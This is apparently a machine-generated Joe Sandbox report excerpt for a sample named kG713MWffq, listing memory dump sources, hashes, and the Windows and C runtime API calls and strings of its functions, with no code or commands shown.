                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                        • String ID:
                                                                                        • API String ID: 3969911579-0
                                                                                        • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                        • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                                        • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                        • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                                        • String ID: 0
                                                                                        • API String ID: 956284711-4108050209
                                                                                        • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                        • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                                        • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                        • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                        • String ID: 0.0.0.0
                                                                                        • API String ID: 1965227024-3771769585
                                                                                        • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                                        • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                                        • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                                        • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                                        APIs
                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString$_memmove_wcslen
                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                        • API String ID: 369157077-1007645807
                                                                                        • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                        • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                                        • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                        • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                                        APIs
                                                                                        • GetParent.USER32 ref: 00445BF8
                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                                        • __wcsicoll.LIBCMT ref: 00445C33
                                                                                        • __wcsicoll.LIBCMT ref: 00445C4F
                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                        • API String ID: 3125838495-3381328864
                                                                                        • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                        • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                                        • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                        • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                                        • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                                        • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                                        • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                                        • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CharNext
                                                                                        • String ID:
                                                                                        • API String ID: 1350042424-0
                                                                                        • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                        • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                                        • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                        • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                                        APIs
                                                                                          • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                          • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                        • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                                        • _wcscpy.LIBCMT ref: 004787E5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                        • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                        • API String ID: 3052893215-2127371420
                                                                                        • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                        • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                                        • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                        • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                                        APIs
                                                                                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                        • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                                        • __swprintf.LIBCMT ref: 0045E7F7
                                                                                        • _wprintf.LIBCMT ref: 0045E8B3
                                                                                        • _wprintf.LIBCMT ref: 0045E8D7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                        • API String ID: 2295938435-2354261254
                                                                                        • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                        • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                                        • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                        • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                        • API String ID: 3038501623-2263619337
                                                                                        • Opcode ID: 968b7d06867b1c0100c5da1b7d5431dad45df0707eae99a9119b858356642d8e
                                                                                        • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                                        • Opcode Fuzzy Hash: 968b7d06867b1c0100c5da1b7d5431dad45df0707eae99a9119b858356642d8e
                                                                                        • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                                        APIs
                                                                                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                        • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                        • __swprintf.LIBCMT ref: 0045E5F6
                                                                                        • _wprintf.LIBCMT ref: 0045E6A3
                                                                                        • _wprintf.LIBCMT ref: 0045E6C7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                        • API String ID: 2295938435-8599901
                                                                                        • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                        • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                                        • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                        • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                                        APIs
                                                                                        • timeGetTime.WINMM ref: 00443B67
                                                                                          • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                                        • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                                                        • SetActiveWindow.USER32(?), ref: 00443BEC
                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                                        • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                                                        • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                                        • IsWindow.USER32(?), ref: 00443C3A
                                                                                        • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                                                          • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                          • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                          • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                        • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                        • String ID: BUTTON
                                                                                        • API String ID: 1834419854-3405671355
                                                                                        • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                        • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                                        • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                        • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                        • LoadStringW.USER32(00000000), ref: 00454040
                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                        • _wprintf.LIBCMT ref: 00454074
                                                                                        • __swprintf.LIBCMT ref: 004540A3
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                        • API String ID: 455036304-4153970271
                                                                                        • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                        • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                        • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                        • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                        APIs
                                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                                        • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                        • _memmove.LIBCMT ref: 00467EB8
                                                                                        • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                        • _memmove.LIBCMT ref: 00467F6C
                                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                        • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                                        • String ID:
                                                                                        • API String ID: 2170234536-0
                                                                                        • Opcode ID: 3d86a1b5ea0e599cd8b6d68b8f59e2f86878088e6b6264a2abca6a2ed6f74cd8
                                                                                        • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                                        • Opcode Fuzzy Hash: 3d86a1b5ea0e599cd8b6d68b8f59e2f86878088e6b6264a2abca6a2ed6f74cd8
                                                                                        • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                        • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                        • GetKeyState.USER32(000000A0), ref: 00453D75
